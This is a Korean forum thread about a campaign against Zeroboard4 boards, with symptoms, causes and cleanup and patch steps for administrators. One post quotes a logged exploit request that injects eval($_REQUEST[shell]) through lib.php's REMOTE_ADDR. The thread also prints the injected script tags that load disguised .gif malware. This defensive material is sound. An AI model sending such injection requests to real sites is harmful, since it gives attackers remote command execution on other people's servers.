제로보드4는 공식적으로 더 이상 개발되지도 배포되지도 않습니다.
제로보드4를 사용하기 위한 팁보다 제로보드4를 안전하고 무사히 다른 툴로 이전하는 팁들을 게재해주시면 감사하겠습니다.
시간이 오래 지난 만큼 오래된 프로그램은 보안 및 사용성에 있어 문제가 많으니 이해 바랍니다.
![[레벨:6]](http://www.xpressengine.com/modules/point/icons/default/6.gif "포인트:4160point (78%), 레벨:6/30"){kind=icon}
쿨~~대충 정리하느라 경어를 쓰다안쓰다 그럽니다.
현재 제트오디오를 사용하는 사용자를 타겟으로 제로보드에 급속한 바이러스가 퍼지고있으니
주의바랍니다.
MS XMLHTTP 4.0 Active X Control 원격 코드 실행, 제로데이 취약점
제로보드 사용자 비상 !
국내에서 많이 사용되고 있는 무료 홈페이지 게시판 프로그램인 '제로보드(Zeroboard)'에서
홈페이지 변조 및 시스템 제어권한이 무단으로 획득이 가능한 신규 취약점이 발견됨에 따라
소스코드 변경, 프로그램 환경설정 변경, 신속히 수정을 하시기 바랍니다.
또한, 각급기관이 운영중인 홈페이지 중 사용되지 않고 방치된 홈페이지에도 '제로보드' 게시판이
사용될 수 있으므로 확인 후 수정하거나, 휴먼 홈페이지 정리를 해주시기 바랍니다.
특히, 공공기관의 경우에는 신속한 보안패치가 제공되지 않는 무료 프로그램의 사용을
금지해 주실 것을 다시 한 번 권고 드립니다.
본 취약점은 중국에서 시작되어 한국을 노린 악성코드로써
9var artist = "Korea";
10var album = "Fuck"; 라는 스크립트를 포함하고 있다.
■ 증상
액티브x를 설치하라는 창이 뜬다.
작업관리자 프로세스에 IEXPLORE.EXE 가 여러개 뜨며
간혹 익스플로러 창이 모두 닫히거나 cpu사용량이 증가하며 컴퓨터가 느려진다.
현재 알려지지않은 악성코드를 담은 바이러스로 이를 체크해주는 백신은 적음.
액티브x를 설치함으로써 개인정보유출의 위험이 큼.
중국어로 404에러 페이지가 뜨지만 그페이지는 만들어진것일뿐 실제로 소스속에는 악성코드들이 숨어있음.
현재 트로이목마 Trojan.Win32.Agent.jp 가 발견되며 특정 exe파일을 감염시키는것으로 알려짐.
파이어폭스 사용자나 익스플로러7이상 사용자는 큰문제는 없지만 이하버전 사용자에게는 경우에따라
컴퓨터에 치명적 손상일 입힐 수 있음.
■ 원인
제트오디오 7.x 버젼에서 DownloadFromMusicStore 관련 스크립. 제트오디오의 취약점을 이용한 공격.
(제트오디오에서의 음악구매 서비스 사용시에 일어남)
제로보드 업로드를 이용한 파일수정권한 획득 .
제로보드의 업로드를 통한 파일확장명 보존이 원인. (파일명 변환이 시급함.)
gif속에 악성코드를 숨기거나 jpg에 php실행문을 숨겨 해킹이 가능하기에 보안대처법이 시급한 상황.
■ 제로보드 관리자 대처법
제로보드설치경로/images/admin_info.gif , 나 admin_addidinfo 라는 파일명을 가진 파일을 확인하고 삭제
제로보드설치경로/_haed.php 파일을 검사 . _head.php old 파일을 확인후 삭제 . _head.php파일을 덮어씌워서 원상복구 하셔야합니다.
국가사이버안전센터에서 업로드를 통한 프로그램 수정권고가 이미 내려진바 있으며 해당부분 패치방법은
제로보드사이트(http://zeroboard.com)에서 제로보드4->사용자팁에서 '보안'으로 검색하면 나옴
■ 일반사용자 대처법
마이크로소프트 최신 보안패치 (http://www.microsoft.com/korea/technet/security/bulletin/ms06-071.mspx)
익스플로러 host 파일을 수정함으로써 xin8.info을 무시하도록 설정.
인터넷 익스플로러 7.0이상및 파이어폭스를 사용, 백신최신버전으로 업데이트 (국내 백신은 못잡는것이 많음)
신뢰할수 없는 액티브x 설치금지.
제트오디오7.x 버전 사용 자제 및 다운그레이드버전사용.
![[레벨:1]](http://www.xpressengine.com/modules/point/icons/default/1.gif "포인트:340point (92%), 레벨:1/30"){kind=icon}
지음아이
![[레벨:3]](http://www.xpressengine.com/modules/point/icons/default/3.gif "포인트:1375point (89%), 레벨:3/30"){kind=icon}
아드레날린저는 dq 게시판(드림퀘스트님)을 사용하는데요
파일 업로드시 파일명 변경이 안되네요.....혹시 아시는지요 쿨~~님
바이러스 파일들을 잡아내고 나니 홈피속도가 날아다닙니다 ㅎㅎ
하늘다리
제로보드설치경로/images/admin_info.gif , 나 admin_addidinfo 라는 파일명을 가진 파일을 확인하고 삭제
제로보드설치경로/_haed.php 파일을 검사 . _head.php old 파일을 확인후 삭제 . _head.php파일을 덮어씌워서 원상복구 하셔야합니다.
국가사이버안전센터에서 업로드를 통한 프로그램 수정권고가 이미 내려진바 있으며 해당부분 패치방법은
제로보드사이트(http://zeroboard.com)에서 제로보드4->사용자팁에서 '보안'으로 검색하면 나옴
저는 사이트 관리자인데 위 방법대로 해도 매일 해킹당합니다. 타겟 당하고 있고 피해가 커질까봐 닫았습니다.
혹시 위 방법대로 했는데 괜찮은 분 계신가요? 저는 그럼에도 계속 해킹 당합니다.
이 파일이 어떻게 등록이 가능한가.. 에 대해서 심각하게 따져봐야 할 것 같은데요? _head.php 가 바뀐다는 뜻은 누군가가 php 파일을 서버에 FTP방식이 아닌 다른 방식으로 등록을 하고 있다는 뜻인데, 이것이 누군가가 제로보드의 글쓰기 기능을 통해 올리는 것인지 아니면 그 외의 방법으로 올리는 것인지가 궁금합니다. 글쓰기 기능을 통해 올리는 것이라면 write_ok.php 에서 언제든지 고칠 수 있는 것이며 위에서 설명된 PHP파일업로드금지 방법을 통해 해결할 수 있을 것일테지요..아니면 비회원의 글쓰기를 임시로 금지해버리는 것도 방법일테구요.. 아무리 악성코드가 담긴 파일이 들어있다고 하여도 그것을 보여주게 하는 스크립트 내지 실행문이 없다면 소용이 없잖아요? 서버를 직접 건드리는 분이라면 아파치의 httpd.conf 에서 overide all 등의 설정을 주석처리해버리시고, allow_url_fopen은 off. 혹시 파일필드 추가를 통한 무한업로드(파일10개) 를 쓰시는 분이라면 해당 소스부분에
$s_file_name3 = preg_replace("/.(ph|in|htacc|htm|cgi|pl|sh|vb|js|pm|dat|dot|asp)+/i","\0-zeroboard", $s_file_name3);
$s_file_name4 = preg_replace("/.(ph|in|htacc|htm|cgi|pl|sh|vb|js|pm|dat|dot|asp)+/i","\0-zeroboard", $s_file_name4);
.
.
.
등을 삽입해 모두 다 처리를 해야 할 것입니다..
DQ레볼루션의 경우는 이 문제에 대해 이미 제작당시부터 보완을 하고 있으므로 안심해도 되며.
o DQ Style Revolution BBS 1.2 ~ 1.2.p3
o DQ Style Revolution Gallery 1.5 ~ 1.5.p3
을 사용하시는 분은 http://www.dqstyle.com/bbs/view.php?id=revolution&no=32 을 참고하세요
DQ레볼루션 제작자분의 홈도 뚫였습니다. 오늘 낮까지 크래팅 파일이 있더니 지금보니 지우셨네요....
*-------------------------------------------------------------------------------------------------------------------------------------------
안녕하세요.
최근 중국발 크래킹이 발생하고 있습니다.
크래킹을 하는 방법에 대해서 찾고 있던중 "덕규"님의 도움으로 취약점 공격하는 것을 찾았습니다.
공격법은 lib.php에 $REMOTE_ADDR이라는 변수의 값을 data/now_connect.php 파일에 기록하는 것을 이용하여 $REMOTE_ADDR 변수에 대한 eval script코드를 삽입하여 원하는 command를 실행하는 것으로 파악했습니다.
일단 제로보드4를 기본으로 사용하시는 분은 첨부한 lib.php 파일을 덮어쓰시면 됩니다.
수정하고 계시는 분들은 다음과 같이 해주세요.
- lib.php 파일을 에디터 등으로 연다
- $REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
- 이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다.
제로보드4의 경우 매우 오래전에 개발을 하였고 업그레이드가 원활치 않아서 다양한 부분에서 보안 취약점이 존재하고 있습니다.
많은 분들이 참여해서 만들어 주신 스킨등을 이용하기 위해서 제로보드4를 업그레이드할 수도 없어 제로보드XE라는 새로운 버전을 개발하게 되었던 것이구요.
최대한 빨리 제로보드XE의 안정성을 확보하고 데이터 이전을 완벽히 되도록 하여 보안 취약점으로 인한 불편을 최대한 줄여드릴 수 있도록 하겠습니다.
참고로 이런 보안 취약점의 경우 저에게 직접 리포팅이 되지 않는 경우가 있습니다.
개인 메일 주소를 자주 바꾸어서 그런 것 같은데 혹시 보안 취약점을 발견하셨을 경우 제 아이디로 쪽지(메일 발송 포함)로 알려주시면 감사하겠습니다.
![[레벨:4]](http://www.xpressengine.com/modules/point/icons/default/4.gif "포인트:1500point (7%), 레벨:4/30"){kind=icon}
미니어스7071. 제로보드 lib.php 취약점 이용
GET /tvxq/lib.php?REMOTE_ADDR=*/eval($_REQUEST[shell]);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS[REMOTE_ADDR]=*/eval($_REQUEST[shell]);/* HTTP/1.0" 200 0 "-" "-"
2. 고객분들에게 패치하라고 하거나 임시로 data 디렉토리 밑에서 php 실행 못하게 함.
data/.htaccess
php_value engine off
3. 백도어 php 찾기
find . -name "__zbSessionTMP" -prune -o -name "*.php" -exec egrep 'gzinflate|shell' -l {} \;
주로
cm_comment_head.php 나. search_zipcode1.php , member_1123882756.php
4. 변조된 php 파일 수정
대개 _head.php 의 맨 마지막 라인 제거
<script language="javascript" type="text/javascript" src="icon/zboard.gif"></script>
<script language="javascript" type="text/javascript" src="images/admin_info.gif"></script>
이글은 카페24측에서 쿨드닷컴(http://www.cooold.com/)을 위해 제공된 문서중 일부를 발췌하였습니다.
![[레벨:13]](http://www.xpressengine.com/modules/point/icons/default/13.gif "포인트:15315point (4%), 레벨:13/30"){kind=icon}
이진수닷넷
정확하게 어떤 자료인지 알려주셨더라면 더 좋았을텐데요...;;
보안이라고 검색해도 워낙 많이 나와서요..